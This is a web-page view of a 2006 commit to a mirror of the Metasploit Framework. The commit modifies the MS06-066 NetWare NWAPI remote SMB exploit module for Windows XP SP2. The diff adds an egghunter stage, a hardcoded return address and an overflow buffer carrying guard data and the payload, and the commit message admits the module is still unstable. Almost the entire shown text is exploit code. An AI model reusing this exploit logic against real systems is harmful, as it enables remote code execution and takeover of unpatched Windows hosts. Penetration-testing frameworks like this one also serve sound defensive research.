infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Much closer, but the egg hunter never seems to find the eggs :( 

git-svn-id: file:///home/svn/framework3/trunk@4158 4d416f70-5f16-0410-b530-b9f4589650da
unstable
pusscat 2006-12-01 16:39:25 +00:00
parent dc0ad61c85
commit c619cc6a12
1 changed files with 26 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
modules/exploits/windows/smb/ms06_066_nwapi.rb
View File

@ -4,6 +4,7 @@ module Msf
class Exploits::Windows::Smb::MS06_066_NWAPI < Msf::Exploit::Remote class Exploits::Windows::Smb::MS06_066_NWAPI < Msf::Exploit::Remote
include Exploit::Remote::Egghunter
include Exploit::Remote::DCERPC include Exploit::Remote::DCERPC
include Exploit::Remote::SMB include Exploit::Remote::SMB
@ -30,7 +31,7 @@ class Exploits::Windows::Smb::MS06_066_NWAPI < Msf::Exploit::Remote
'Privileged' => true, 'Privileged' => true,
'Payload' => 'Payload' =>
{ {
'Space' => 1000, 'Space' => 296,
'BadChars' => "", 'BadChars' => "",
'Compat' => 'Compat' =>
{ {
@ -44,7 +45,8 @@ class Exploits::Windows::Smb::MS06_066_NWAPI < Msf::Exploit::Remote
[ [
'Windows XP SP2', 'Windows XP SP2',
{ {
'Ret' => 0x0BADB0D0 , #'Ret' => 0x0BADB0D0 ,
'Ret' => 0x00EBEEEC ,
}, },
] ]
], ],
@ -65,14 +67,32 @@ class Exploits::Windows::Smb::MS06_066_NWAPI < Msf::Exploit::Remote
# [in, out] long # [in, out] long
# [out] handle # [out] handle
ofstring = Rex::Text.to_unicode('\\\\') + "A"*296 + [ target.ret ].pack('V') + "\x00\x00" # greater than 512 bytes # Generate the egghunter payload
hunter = generate_egghunter()
egg = hunter[1]
#print_status("Today, we'll be hunting for 0x#{egg.unpack("V")[0]}")
# Add giant blocks of guard data before and after the egg
eggdata =
Rex::Text.rand_text(1024) +
egg +
egg +
payload.encoded +
Rex::Text.rand_text(1024)
buflen = 295
ofstring = Rex::Text.to_unicode('\\\\') + "\x90" + hunter[0] + Rex::Text.rand_text(buflen-hunter[0].length) +
[ target.ret ].pack('V') + "\x00"
#ofstring = Rex::Text.to_unicode('\\\\') + payload.encoded + [ target.ret ].pack('V') + "\x00\x00"
stubdata = stubdata =
NDR.long(rand(0xffffffff)) + NDR.long(rand(0xffffffff)) +
NDR.UnicodeConformantVaryingString("\\\\BBBB") + NDR.UnicodeConformantVaryingString("\\\\BBBB") +
NDR.UnicodeConformantVaryingStringPreBuilt(ofstring) + # HERE! NDR.UnicodeConformantVaryingStringPreBuilt(ofstring) + # HERE!
#NDR.UnicodeConformantVaryingString('\\\\' + "A"*1024 + "\x00") + #NDR.UnicodeConformantVaryingString('\\\\' + "A"*1024 + "\x00") +
NDR.long(rand(0xffffffff)) + NDR.long(rand(0xffffffff)) +
NDR.long((ofstring.length * 2) + 0xC) + NDR.long(rand(0xffffffff)) +
#NDR.long((ofstring.length * 2) + 0xC) +
eggdata